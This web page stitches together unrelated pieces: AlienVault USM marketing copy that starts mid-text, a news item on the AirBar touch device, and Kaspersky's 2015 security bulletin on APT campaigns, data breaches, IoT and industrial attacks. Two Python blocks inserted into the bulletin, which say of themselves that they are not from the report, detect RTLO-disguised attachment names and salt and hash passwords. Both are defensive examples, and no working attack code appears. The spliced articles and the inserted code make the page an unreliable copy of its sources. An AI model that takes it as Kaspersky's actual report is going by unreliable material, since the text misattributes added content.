The AlienVault Labs threat research team spends countless hours mapping out the different types of cyber attacks, the most recent threats, suspicious behavior, vulnerabilities and exploits they uncover across the entire threat landscape.
The team regularly delivers threat intelligence as a coordinated set of updates to the USM platform, which accelerates and simplifies threat detection and remediation.
OTX is the world’s first truly open threat intelligence community that enables collective defense with actionable, community-powered threat data.
It alerts you whenever an indicator of compromise (IOC) related to a new or emerging threat documented in the OTX database is detected in your network.
OTX enables everyone in the OTX community to collaborate actively and strengthen their defenses while helping others do the same.
Integrate Data from Existing Security Tools
The USM platform’s open architecture also enables you to utilize a much wider range of network and security data if you wish.
You can integrate security events from 3rd party tools, utilizing the extensive plugin library, or create custom plugins for unique applications running on your network.
Simplify Regulatory Compliance Requirements
AlienVault USM automatically identifies significant audit events that warrant immediate action. From file integrity monitoring to IDS to log management, USM makes compliance easier.
Not only does it provide the , but USM also gathers the information and generates the reports to give to auditors.
Additionally, USM includes a report library that provides flexible reporting and executive dashboards that make compliance measurement, reporting, and audits less painful.
USM allows you to demonstrate to auditors and management that your incident response program is robust and reliable for a range of regulations and guidelines, including PCI DSS, HIPAA, ISO 27002, SOX, GPG13 and more.
Deployment flexibility
The USM platform is also designed to meet a wide range of deployment requirements.
All of the AlienVault USM products are available in various models and form factors, based on size, scale, and configuration requirements.
You can quickly deploy AlienVault USM – as a dedicated hardware appliance, a virtual appliance, or as a cloud appliance within the Amazon AWS environment.
For one location, you can deploy a single USM All-in-One tool. The All-in-One appliance consolidates all USM functions into a single hardware or virtual appliance for reduced complexity and rapid deployment.
All event logs are forwarded to a single USM All-in-One appliance for collection, aggregation, analysis, correlation and reporting.
For larger networks, multiple locations, or locations with a high volume of events and/or performance requirements, you will want to deploy separate USM Standard or Enterprise components, either hardware or virtual appliances, to benefit from the improved performance.
Server – Aggregates and correlates information gathered by the Sensors, and provides single-pane-of-glass management, reporting, and administration.
Logger – Securely archives raw event log data for forensic investigations and compliance mandates.
Sensor – Deploys throughout the network to collect logs and provide the five essential security capabilities you need for complete visibility.
There is also a version of AlienVault USM for AWS that is built for the Amazon “shared responsibility” security model.
The AWS-native USM for AWS maximizes visibility into potential threats and misconfigurations and makes it easy to use built-in AWS security features like CloudTrail and Security Groups.
Try it for free
With USM you can achieve true security visibility in minutes, not months. If you'd like to take a closer look at AlienVault USM, you can , or you can on the AlienVault website.

How to Turn Any Non-Touch Screen PC Into a Touch Screen
Want to buy a touch-screen laptop but can't afford it?
But what if I told you that you can turn your existing non-touch-screen laptop into a Touch Screen laptop?
Yes, it's possible. You can now convert your laptop or PC into a touch screen with the help of a new device called AirBar.
Touch screens have become a popular feature on laptops these days, and many laptops are moving toward having them, but not every laptop or desktop model comes with the feature.
Swedish company Neonode has brought you a new device, AirBar, that brings touch technology to virtually any computer, from non-touch laptops to notebooks.
What is AirBar and How does it Work?
AirBar is a small plug-and-touch bar that attaches magnetically to the bottom of your machine's display.
When connected to your laptop via an available USB port, AirBar starts emitting a beam of invisible light across your screen that is used to track touchscreen movements and gestures.
The movements and gestures are then translated into corresponding inputs, so you can use all the usual gestures, including poking, pinching, swiping, zooming and scrolling, with your hand, just as on a touchscreen PC.
Video Demonstration
AirBar turns any laptop, computer, or notebook into a touchscreen machine, without making any changes to its hardware.
You can watch the video below to see how AirBar really works.

What's great about AirBar is that it even works if you are wearing gloves, or with any other object.
AirBar works well with any device running Windows 8 or Windows 10, or even with a Chromebook, but it still lacks proper OS X support.
The AirBar is going to retail for $49 next month, with its public launch in January 2016 at the CES event in Las Vegas. Currently, the only size that AirBar accommodates is 15.6-inch screens.

Kaspersky Security Bulletin 2015. Top security stories
19.12.2015 Source: Kaspersky

Targeted attacks and malware campaigns

Targeted attacks are now an established part of the threat landscape, so it’s no surprise to see such attacks feature in our yearly review. Last year, in our security forecast, we outlined what we saw as the likely future APT developments.

The merger of cybercrime and APT
Fragmentation of bigger APT groups
Evolving malware techniques
New methods of data exfiltration
APT arms race
Here are the major APT campaigns that we reported this year.

Carbanak combined cybercrime – in this case, stealing money from financial institutions – with the infiltration techniques typical of a targeted attack. The campaign was uncovered in spring 2015: Kaspersky Lab was invited to conduct a forensic investigation of a bank’s systems after some of its ATMs started to dispense cash ‘randomly’. It turned out that the bank was infected. Carbanak is a backdoor designed to carry out espionage, data exfiltration and remote control of infected computers. The attackers used APT-style methods to compromise their victims – sending spear-phishing e-mails to bank employees. Once the backdoor was installed on a bank’s computer, the attackers carried out reconnaissance to identify systems related to processing, accounting and ATMs, and simply mimicked the activities of legitimate employees. Carbanak used three methods to steal money: (1) dispensing cash from ATMs, (2) transferring money to cybercriminals using the SWIFT network and (3) creating fake accounts and using mule services to collect the money. The attackers targeted around 100 financial institutions, with total losses amounting to almost $1 billion.


One of the most talked-about news stories of Q1 2015 surrounded the Equation cyber-espionage group. The attackers behind Equation successfully infected the computers of thousands of victims in Iran, Russia, Syria, Afghanistan, the United States and elsewhere – victims included government and diplomatic institutions, telecommunications companies and energy firms. This is one of the most sophisticated APT campaigns we’ve seen: one of the many modules developed by the group modifies the firmware of hard drives – providing a level of stealth and persistence beyond other targeted attacks. It’s clear that development of the code stretches back to 2001 or earlier. It’s also related to other notorious attacks, Stuxnet and Flame – for example, its arsenal included two zero-day vulnerabilities that were later to be used in Stuxnet.

While investigating an incident in the Middle East, we uncovered the activity of a previously unknown group conducting targeted attacks. Desert Falcons is the first Arabic-speaking group that has been seen conducting full-scale cyber-espionage operations – apparently connected with the political situation in the region. The first signs of this campaign date back to 2011. The first infections took place in 2013, although the peak of activity was in late 2014 and early 2015. The group has stolen over 1 million files from more than 3,000 victims. The victims include political activists and leaders, government and military organizations, mass media and financial institutions – located primarily in Palestine, Egypt, Israel and Jordan. It’s clear that members of the Desert Falcons group aren’t beginners: they developed Windows and Android malware from scratch, and skillfully organized attacks that relied on phishing e-mails, fake web sites and fake social network accounts.

In March 2015, we published our report on the Animal Farm APT, although information on the tools used in this campaign started appearing in the previous year. In March 2014, the French newspaper Le Monde published an article on a cyber-espionage toolset that had been identified by Communications Security Establishment Canada (CSEC): this toolset had been used in the ‘Snowglobe’ operation that targeted French-speaking media in Canada, as well as Greece, France, Norway and some African countries. CSEC believed that the operation might have been initiated by French intelligence agencies. A year later, security researchers published analyses of malicious programs that had much in common with ‘Snowglobe’: in particular, the research included samples with the internal name ‘Babar’ – the name of the program mentioned by CSEC. Following analysis of the malicious programs, and the connections between them, Kaspersky Lab named the group behind the attacks as Animal Farm. The group’s arsenal included two of the three zero-day vulnerabilities that we had found in 2014 and that had been used by cybercriminals: for example, an attack from the compromised web site of the Syrian Ministry of Justice using CVE-2014-0515 exploits led to the download of an Animal Farm tool called ‘Casper’. One curious feature of this campaign is that one of its programs, ‘NBOT’, is designed to conduct DDoS (Distributed Denial of Service) attacks. This is rare for APT groups. One of the malicious ‘animals’ in the farm has the strange name ‘Tafacalou’ – possibly an Occitan word (a language spoken in France and some other places).

In April 2015, we reported the appearance of a new member of a growing ‘Duke’ family that already includes MiniDuke, CosmicDuke and OnionDuke. The CozyDuke APT (also known as ‘CozyBear’, ‘CozyCat’ and ‘Office Monkeys’) targets government organisations and businesses in the United States, Germany, South Korea and Uzbekistan. The attack implements a number of sophisticated techniques, including the use of encryption, anti-detection capabilities and a well-developed set of components that are structurally similar to earlier threats within the ‘Duke’ family. However, one of its most notable features is its use of social engineering. Some of the attackers’ spear-phishing e-mails contain a link to hacked web sites – including high-profile, legitimate sites – that host a ZIP archive. This archive contains a RAR SFX that installs the malware while showing an empty PDF as a decoy. Another approach is to send out fake flash videos as e-mail attachments. A notable example (one that gives the malware one of its names) is ‘OfficeMonkeys LOL’. When run, this drops a CozyDuke executable onto the computer, while playing a ‘fun’ decoy video showing monkeys working in an office. This encourages victims to pass the video around the office, increasing the number of compromised computers. The successful use of social engineering to trick staff into doing something that jeopardises corporate security – by CozyDuke and so many other targeted attackers – underlines the need to make staff education a core component of any business security strategy.

The Naikon APT focused on sensitive targets in south-eastern Asia and around the South China Sea. The attackers, who seem to be Chinese-speaking and have been active for at least five years, target top-level government agencies and civil and military organisations in the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, Nepal, Thailand, Laos and China. Like so many targeted attack campaigns, Naikon makes extensive use of social engineering to trick employees of target organizations into installing the malware. The main module is a remote administration tool that supports 48 commands designed to exercise control over infected computers: these include commands to take a complete inventory, download and upload data, install add-on modules and use keyloggers to obtain employees’ credentials. The attackers assigned an operator to each target country, able to take advantage of local cultural features – for example, the tendency to use personal e-mail accounts for work. They also made use of a specific proxy server within a country’s borders, to manage connections to infected computers and transfer of data to the attackers’ Command-and-Control (C2) servers. You can find our main report and follow-up report on our web site.

While researching Naikon, we also uncovered the activities of the Hellsing APT group. This group focused mainly on government and diplomatic organisations in Asia: most victims are located in Malaysia and the Philippines, although we have also seen victims in India, Indonesia and the US. In itself, Hellsing is a small and technically unremarkable cyber-espionage group (around 20 organisations have been targeted by Hellsing). What makes it interesting is that the group found itself on the receiving end of a spear-phishing attack by the Naikon APT group – and decided to strike back! The recipient of the e-mail questioned its authenticity with the sender. They subsequently received a response from the attacker, but didn’t open the attachment. Instead, shortly afterwards they sent an e-mail back to the attackers that contained their own malware. It’s clear that, having detected that they were being targeted, the Hellsing group was intent on identifying the attackers and gathering intelligence on their activities. In the past, we’ve seen APT groups accidentally treading on each other’s toes – for example, stealing address books from victims and then mass-mailing everyone on each of the lists. But an APT-on-APT attack is unusual.


Many targeted attack campaigns focus on large enterprises, government agencies and other high-profile organisations. So it’s easy to read the headlines and imagine that such organisations are the only ones on the radar of those behind targeted attacks. However, one of the campaigns we reported last quarter showed clearly that it’s not only ‘big fish’ that attackers are interested in. The Grabit cyber-espionage campaign is designed to steal data from small- and medium-sized organisations – mainly based in Thailand, Vietnam and India, although we have also seen victims in the US, UAE, Turkey, Russia, China, Germany and elsewhere. The targeted sectors include chemicals, nanotechnology, education, agriculture, media and construction. We estimate that the group behind the attacks has been able to steal around 10,000 files. There’s no question that every business is a potential target – for its own assets, or as a way of infiltrating another organisation.

In spring 2015, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several internal systems. The full-scale investigation that followed uncovered the development of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu, sometimes referred to as the step-brother of Stuxnet. We named this new platform ‘Duqu 2.0’. In the case of Kaspersky Lab, the attack took advantage of a zero-day vulnerability in the Windows kernel (patched by Microsoft on 9 June 2015) and possibly up to two others (now patched) that were also zero-day vulnerabilities at the time. The main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes. However, Kaspersky Lab was not the only target. Some Duqu 2.0 infections were linked to the P5+1 events related to negotiations with Iran about a nuclear deal: the attackers appear to have launched attacks at the venues for some of these high-level talks. In addition, the group launched a similar attack related to the 70th anniversary event of the liberation of Auschwitz-Birkenau. One of the most notable features of Duqu 2.0 was its lack of persistence, leaving almost no traces in the system. The malware made no changes to the disk or system settings: the malware platform was designed in such a way that it survives almost exclusively in the memory of infected systems. This suggests that the attackers were confident that they could maintain their presence in the system even if an individual victim’s computer was rebooted and the malware was cleared from memory. The Duqu 2.0 technical paper and analysis of the persistence module can be found on our web site.

In August, we reported on the Blue Termite APT, a targeted attack campaign focused on stealing information from organisations in Japan. These include government agencies, local government bodies, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation and more. One of the most high-profile targets was the Japan Pension Service. The malware is customized according to the specific victim. The Blue Termite backdoor stores data about itself – including C2, API name, strings for anti-analysis, values of mutexes, as well as the MD5 checksum of backdoor commands and the internal proxy information. The data is stored in encrypted form, making analysis of the malware more difficult – a unique decryption key is required for each sample. The main method of infection, as with so many targeted attack campaigns, is via spear-phishing e-mails. However, we have seen other methods of infection. These include drive-by downloads using a Flash exploit (CVE-2015-5119) – one of the exploits leaked following the Hacking Team security breach; several Japanese web sites were compromised this way. We also found some watering-hole attacks, including one on a web site belonging to a prominent member of the Japanese government.

The group behind the Turla cyber-espionage campaign has been active for more than eight years now (see our initial report, follow-up analysis and campaign overview), infecting hundreds of computers in more than 45 countries. The attackers profile their victims using watering-hole attacks in the initial stages. However, as outlined in our latest report, for subsequent operations the group makes use of satellite communications to manage its C2 traffic. The method used by Turla to hijack downstream satellite links does not require a valid satellite Internet subscription. The key benefit is that it’s anonymous – it’s very hard to identify the attackers. The satellite receivers can be located anywhere within the area covered by the satellite (typically a wide area) and the true location and hardware of the C2 server can’t be identified easily or physically seized. It’s also cheaper than purchasing a satellite-based link and easier than hijacking traffic between the victim and the satellite operator and injecting packets along the way. The Turla group tends to focus on satellite Internet providers located in the Middle East and Africa, including Congo, Lebanon, Libya, Niger, Nigeria, Somalia and the UAE. Satellite broadcasts from these countries don’t normally cover European and North American countries, making it very hard for security researchers to investigate such attacks. The use of satellite-based Internet links is an interesting development. The hijacking of downstream bandwidth is cheap (around $1,000 for the initial investment and around $1,000 per year in maintenance), easy to do and offers a high degree of anonymity. On the other hand, it is not always as reliable as more traditional methods (bullet-proof hosting, multiple proxy levels and hacked web sites) – all of which Turla also uses. This makes it less likely that it will be used to maintain extensive botnets. Nevertheless, if this method becomes widespread among APT groups or cybercriminals, it will pose a serious problem for the IT security industry and law enforcement agencies.


In August 2015, we published an update on the Darkhotel APT. These attacks were originally characterised by the misuse of stolen certificates, the deployment of HTA files using multiple methods and the infiltration of hotel Wi-Fi to place backdoors on targets’ computers.

While the attackers behind this APT continue to use these methods, they have supplemented their armoury, shifting their attention more towards spear-phishing of their chosen victims. As well as using HTA files, they are also deploying infected RAR files, using the RTLO (right-to-left override) mechanism to mask the real extension of the file. The attackers also use Flash exploits, including a zero-day exploit leaked as a result of the Hacking Team security breach. The group has also extended its geographic reach to include victims in North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, India, Mozambique and Germany.
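Mail gateways and endpoint tools can catch the RTLO disguise described above by looking for Unicode bidirectional control characters in attachment names and comparing the extension a user would see with the real one. The following Python is an added example, not code from the report; the constructed filenames and the simplified model of how an override is rendered are assumptions made here.

```python
import unicodedata

# Unicode bidirectional control characters. U+202E (RIGHT-TO-LEFT OVERRIDE)
# is the one the text describes: everything after it is drawn reversed, so
# "Report\u202efdp.exe" appears on screen as "Reportexe.pdf".
RTLO = "\u202e"
BIDI_CONTROLS = frozenset("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")


def strip_bidi(name: str) -> str:
    """Return the filename as the operating system really sees it (controls removed)."""
    return "".join(c for c in name if c not in BIDI_CONTROLS)


def rendered_name(name: str) -> str:
    """Approximate how a file browser displays the name: text after the first
    RTLO is shown reversed. Assumption: a simplified model of the Unicode bidi
    algorithm, sufficient for the single-override trick described above."""
    if RTLO not in name:
        return strip_bidi(name)
    head, tail = name.split(RTLO, 1)
    return strip_bidi(head) + strip_bidi(tail)[::-1]


def extension(name: str) -> str:
    """Lower-cased text after the last dot of the base name, or '' if none."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def analyze_attachment(name: str) -> dict:
    """Classify one attachment filename. Any bidi control character in a
    filename is suspicious on its own; a mismatch between the displayed and
    real extension is the specific RTLO disguise."""
    controls = sorted({unicodedata.name(c, "U+%04X" % ord(c))
                       for c in name if c in BIDI_CONTROLS})
    shown = rendered_name(name)
    real = strip_bidi(name)
    return {
        "original": name,
        "displayed_as": shown,
        "real_extension": extension(real),
        "apparent_extension": extension(shown),
        "bidi_controls": controls,
        "suspicious": bool(controls),
        "extension_mismatch": bool(controls) and extension(real) != extension(shown),
    }


def scan_attachments(names):
    """Return the analysis records for every suspicious filename in the list."""
    return [r for r in (analyze_attachment(n) for n in names) if r["suspicious"]]


# Constructed sample of attachment names as a mail gateway might log them
# (not real samples from the campaign described above).
SAMPLE_ATTACHMENTS = [
    "quarterly_report.pdf",
    "photos.rar",
    "Report\u202efdp.exe",        # shown as Reportexe.pdf, really an .exe
    "invitation\u202erar.scr",    # shown as invitationrcs.rar, really an .scr
    "notes\u202e.txt",            # override present but nothing useful hidden: flagged anyway
]

if __name__ == "__main__":
    for hit in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"{hit['displayed_as']!r} is really .{hit['real_extension']} "
              f"(controls: {', '.join(hit['bidi_controls'])})")
```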

Data breaches

There has been a steady stream of security breaches this year. That such incidents have become routine is hardly surprising: personal information is a valuable commodity – not just for legitimate companies, but for cybercriminals too. Among the biggest incidents this year were attacks on Anthem, LastPass, Hacking Team, the United States Office of Personnel Management, Ashley Madison, Carphone Warehouse, Experian and TalkTalk. Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. It’s not simply a matter of defending the corporate perimeter. There’s no such thing as 100 per cent security, so it’s not possible to guarantee that systems can’t be breached, especially where someone on the inside is tricked into doing something that jeopardises corporate security. But any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

On the other hand, consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically.

The issue of passwords is one that keeps surfacing. If we choose a password that is too easy to guess, we leave ourselves wide open to identity theft. The problem is compounded if we recycle the same password across multiple online accounts – if one account is compromised, they’re all at risk! This is why many providers, including Apple, Google and Microsoft, now offer two-factor authentication – i.e. requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings. Two-factor authentication certainly enhances security – but only if it’s required, rather than just being an option.
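The two practices recommended in the passages above, salting and hashing stored passwords on the provider's side and checking password length and character mix on the user's side, look like this in code. This is an added Python example, not code from the report; PBKDF2-HMAC-SHA256, the iteration count, the stored-hash format and the sample user table are choices made here.

```python
import hashlib
import hmac
import os
import string

# Stored-hash parameters. Assumption: the text only says "hash and salt", so
# PBKDF2-HMAC-SHA256 with a 16-byte random salt and this iteration count are
# choices made for the example, not a scheme named in the report.
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 200_000
SALT_BYTES = 16
KEY_LEN = 32


def password_meets_policy(password: str, min_length: int = 15) -> list:
    """Check a password against the guidance above: at least 15 characters,
    mixing letters, numbers and symbols. Returns the list of failed rules
    (an empty list means the password is acceptable)."""
    failures = []
    if len(password) < min_length:
        failures.append(f"shorter than {min_length} characters")
    if not any(c.isalpha() for c in password):
        failures.append("no letters")
    if not any(c.isdigit() for c in password):
        failures.append("no digits")
    if not any(c in string.punctuation for c in password):
        failures.append("no symbols")
    return failures


def hash_password(password: str, salt=None) -> str:
    """Derive a salted hash and pack it as 'algorithm$iterations$salt$hash'
    so that the verifier can recover the parameters later."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)  # a fresh random salt per stored password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, ITERATIONS, dklen=KEY_LEN)
    return f"{ALGORITHM}${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False  # malformed record: never accept it
    if algorithm != ALGORITHM:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations),
                                    dklen=KEY_LEN)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def salted_hashes_differ(password: str) -> bool:
    """Why the salt matters: two users with the same password must not end up
    with the same stored hash, otherwise one leaked record exposes both and
    precomputed tables become usable against the whole database."""
    return hash_password(password) != hash_password(password)


# Constructed sample of what a credential table holds after a breach: the
# attacker obtains salted hashes, never the passwords themselves.
if __name__ == "__main__":
    users = {"alice": "correct-horse-battery-staple-42", "bob": "Password1!"}
    table = {u: hash_password(p) for u, p in users.items()}
    for user, pw in users.items():
        problems = password_meets_policy(pw) or ["ok"]
        print(user, table[user][:40] + "...", "policy:", "; ".join(problems))
    print("alice logs in:", verify_password("correct-horse-battery-staple-42", table["alice"]))
    print("wrong password:", verify_password("correct-horse-battery-staple-43", table["alice"]))
```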

The theft of personal data can have serious consequences for those affected. However, sometimes there can be serious knock-on effects. The Hacking Team breach resulted in the publication of 400GB of data: this included exploits used by the Italian company in its surveillance software. Some of the exploits were used in APT attacks – Darkhotel and Blue Termite. Unsurprisingly, the breach was followed by a scramble to patch the vulnerabilities exposed by the attackers.

Smart (but not necessarily secure) devices

The Internet is woven into the fabric of our lives – literally in the case of the growing number of everyday objects used in the modern home – smart TVs, smart meters, baby monitors, kettles and more. You may remember that last year one of our security researchers investigated his own home, to determine whether it was really cyber-secure. We have since published a follow-up to this research. However, the ‘Internet of Things’ encompasses more than household devices.

Researchers have been investigating the potential security risks associated with connected cars for some years. In July 2014 Kaspersky Lab and IAB published a study looking at the potential problem areas of connected cars. Until this year, the focus was on accessing the car’s systems by means of a physical connection to the vehicle. This changed when researchers Charlie Miller and Chris Valasek found a way to gain wireless access to the critical systems of a Jeep Cherokee – successfully taking control and driving it off the road!

This story underlines some of the problems with connected devices that extend beyond the car industry – to any connected device. Unfortunately, security features are hard to sell; and in a competitive marketplace, things that make customers’ lives easier tend to take precedence. In addition, connectivity is often added to a pre-existing communication network that wasn’t created with security in mind. Finally, history shows that security tends to be retro-fitted only after something bad happens to demonstrate the impact of a security weakness. You can read more on these issues in a blog post written by Eugene Kaspersky published in the aftermath of the above research.

Such problems apply also to ‘smart cities’. For example, the use of CCTV systems by governments and law enforcement agencies to monitor public places has grown enormously in recent years. Many CCTV cameras are connected wirelessly to the Internet, enabling police to monitor them remotely. However, they are not necessarily secure: there’s the potential for cybercriminals to passively monitor security camera feeds, to inject code into the network – thereby replacing a camera feed with fake footage – or to take systems offline. Two security researchers (Vasilios Hioureas from Kaspersky Lab and Thomas Kinsey from Exigent Systems) recently conducted research into the potential security weaknesses in CCTV systems in one city. You can read Vasilios’s report on our web site.

Unfortunately, there had been no attempt to mask the cameras, so it was easy to determine the makes and models of the cameras being used, examine the relevant specifications and create a scaled model in the lab. The equipment being used provided effective security controls, but these controls were not being implemented. Data packets passing across the mesh network were not being encrypted, so an attacker would be able to create their own version of the software and manipulate data travelling across it. One way this could potentially be used by attackers would be to spoof footage sent to a police station, making it appear as if there is an incident in one location, thereby distracting police from a real attack occurring somewhere else in the city.

The researchers reported the issues to those in charge of the real-world city surveillance system, and they are in the process of fixing the security problems. In general, it’s important that WPA encryption, protected by a strong password, is implemented in such networks; that labelling is removed from hardware, to make it harder for would-be attackers to find out how the equipment operates; and that footage is encrypted as it travels through the network.

The wider issue here is that more and more aspects of everyday life are being made digital: if security isn’t considered at the design stage, the potential dangers could be far-reaching – and retro-fitting security might not be straightforward. The Securing Smart Cities initiative, supported by Kaspersky Lab, is designed to help those responsible for developing smart cities to do so with cyber-security in mind.

International co-operation against cybercriminals

Cybercrime is now an established part of life, on the back of the ever-increasing online activities we engage in. This is now being reflected in official statistics. In the UK, for example, the Office for National Statistics now includes cybercrime among its estimates of the scale of crime, reflecting the fact that the nature of crime in society is changing. While there’s no question that cybercrime can be lucrative, cybercriminals aren’t always able to act with impunity; and the actions of law enforcement agencies around the world can have a significant impact. International co-operation is particularly important, given the global nature of cybercrime. This year there have been some notable police operations.

In April, Kaspersky Lab was involved in the take-down of the Simda botnet, co-ordinated by the Interpol Global Complex for Innovation. The investigation was started by Microsoft and expanded to other participants, including Trend Micro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department ‘K’ supported by the INTERPOL National Central Bureau in Moscow. As a result of the operation, 14 servers in the Netherlands, the US, Luxembourg, Poland and Russia were taken down. Preliminary analysis of some of the sink-holed server logs revealed that 190 countries had been affected by the botnet.

In September, the Dutch police arrested two men for suspected involvement in CoinVault ransomware attacks, following a joint effort by Kaspersky Lab, Panda Security and the Dutch National High Tech Crime Unit (NHTCU). This malware campaign started in May 2014 and continued into this year, targeting victims in more than 20 countries, with the majority of victims in the Netherlands, Germany, the United States, France and Great Britain. The attackers successfully encrypted files on more than 1,500 Windows-based computers, demanding payment in bitcoin to decrypt data. The cybercriminals responsible for this ransomware campaign modified their creations several times to keep on targeting new victims. In November 2014, Kaspersky Lab and the Dutch NHTCU launched a web site to act as a repository of decryption keys; and we also made available online a decryption tool to help victims recover their data without having to pay the ransom. We have also published an analysis of the twists and turns employed by the CoinVault authors. Ransomware has become a notable fixture of the threat landscape. While this case shows that collaboration between researchers and law enforcement agencies can lead to positive results, it’s essential for consumers and businesses alike to take steps to mitigate the risks of this type of malware. Ransomware operations rely on their victims paying up. In September, an FBI agent caused controversy by suggesting that victims should pay the ransom in order to recover their data. While this might seem to be a pragmatic solution (not least because there are situations where recovery of data is not possible), it’s a dangerous strategy. First, there’s no guarantee that the cybercriminals will provide the necessary mechanism to decrypt the data. Second, it reinforces their business model and makes the further development of ransomware more likely. We would recommend that businesses and individuals alike make regular backups of data, to avoid being put in this invidious position.

Attacks on industrial facilities

Incidents caused by cybersecurity problems are a fairly regular occurrence at industrial facilities. For example, according to US ICS-CERT data, 245 such incidents were recorded in the US during the 2014 fiscal year, and 22 incidents in July and August 2015. However, we believe these numbers do not reflect the actual situation: there are many more cyber incidents than this. And while enterprise operators and owners prefer to keep quiet about some of these incidents, they are simply unaware of others.

Let’s have a look at two cases that caught our attention in 2015.

One is an incident that took place at a steel mill in Germany. Towards the end of 2014, the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, BSI) published a report (see the English-language appendix) which mentioned a cyber incident at a German steel mill. The incident resulted in physical damage to a blast furnace.

This is the second cyberattack that we know of, after Stuxnet, to cause physical damage to industrial facilities. According to BSI, the attackers first used phishing emails to infect the enterprise’s office network, after which the hackers managed to infect a SCADA computer and attack the physical equipment. Unfortunately, BSI did not provide any additional information, so we do not know which malware was used or how it operated.

This secrecy is bad for everybody: operators of other similar enterprises (with the possible exception of German facilities) will not be able to analyze the attack and implement countermeasures; cybersecurity experts are also in the dark and are unable to suggest security measures to their customers.

Another curious incident was an attack against the Frederic Chopin Airport in Warsaw in June 2015. The computer system responsible for preparing flight plans for LOT, Poland’s national airline, was taken down for about five hours one Sunday. According to Reuters, this caused delays to a dozen flights.

The airport management provided no details and experts had to form their opinions based on their experience. Ruben Santamarta, Principal Security Consultant at IOActive, has previously called attention to IT security issues in aviation. Based on what the LOT representatives said, he suggested that the company had fallen victim to a targeted attack: the system couldn’t generate flight plans because key nodes in the back office were compromised, or perhaps the attack targeted ground communication devices, resulting in the inability to perform or validate data loading on aircraft (including flight plans).

Our experts also responded to the incident, suggesting two possible scenarios. The incident may have been the result of human error or equipment malfunction. Alternatively, the incident at the relatively small Warsaw airport could be a precursor of larger-scale attacks on other, much larger, airports.

It was later announced that a DDoS attack had taken place and that no actual penetration had occurred. Once again, no detailed information about the incident was disclosed, and we can either believe the official information or guess at the real reasons and goals of the attack.

Whoever was behind the attacks described above and whatever goals they pursued, these incidents clearly demonstrate how significant a part of our lives computers have become and how vulnerable infrastructure facilities have become in recent years.

Unfortunately, today many governments and regulators resort to a policy of secrecy. We believe that transparency and the exchange of information about cyberattacks is an important part of providing adequate protection for industrial objects. Without this knowledge, it is very hard to protect these objects against future threats

In conclusion, we would like to mention one more trend that is already relevant and will continue to affect us all in the coming years: the hardware used by industrial enterprises is being actively connected to the Web. The Internet may have appeared quite a long time ago, but it is only now that it is being introduced to industrial processes. It is no exaggeration to say that this represents a new industrial revolution: we are witnessing the birth of the ‘Industrial Internet of Things’ or Enterprise 4.0. As a result, enterprises receive a whole host of additional benefits and can improve their manufacturing efficiency

We are witnessing the birth of a new industrial revolution – the ‘Industrial Internet of Things’ #KLReport
In order to keep up with this trend, equipment manufacturers simply add sensors and controllers to proven, safe and reliable equipment originally developed for the ‘offline’ world, provide Internet connectivity for their devices and then offer this ‘new equipment’ to customers. They forget, however, that when online features are added to any device, this gives rise to new cybersecurity-related risks and threats. This is no longer a ‘physical’ device, but a ‘cyber-physical’ one.

In the world of physical devices, all industrial devices, instruments, communication protocols, etc. were designed with safety in mind – in other words, they were built to be foolproof. This meant that if a device was designed to meet functional safety requirements, operating it without violating the safety rules would not result in any failures or damage to people or the environment.

Enterprise 4.0 brings with it a new security dimension: IT security, or protection against intentional external manipulation. You cannot simply connect an object or device from the pre-Internet era to the Internet: the consequences of this can be – and often are – disastrous.

Engineers who embrace old ‘pre-revolutionary’ design principles often fail to realize that their devices can now be ‘operated’ not only by engineers, who know which actions are admissible and which are not, but also by hackers for whom there is no such thing as inadmissible remote object operations. This is one of the main reasons why today some well-established companies with many years of experience offer hardware that may be reliable from the point of view of functional safety, but which does not provide an adequate level of cybersecurity.

In the world of cyber-physical devices, physical and cyber components are tightly integrated. A cyberattack can disrupt an industrial process, damage equipment or cause a technogenic disaster. Hackers are a real threat and anything that is connected to the Internet can be attacked. This is why equipment manufacturers, when designing new connected industrial equipment, should be as careful about implementing protection against cyberthreats as they are about designing functional safety features.


In 2015, perhaps for the first time in the entire history of the Internet, issues related to protecting networks and being protected online were discussed in connection with every sector of the economy and with people’s everyday life. Choose any sector of modern civilization – finances, industrial production, cars, planes, wearable devices, healthcare and many others – and you will be sure to find publications this year on incidents or cybersecurity problems related to that sector.

Regrettably, cybersecurity has now become inseparably linked with terrorism. Defensive, as well as offensive, methods used online are attracting lots of interest from various illegal organizations and groups.

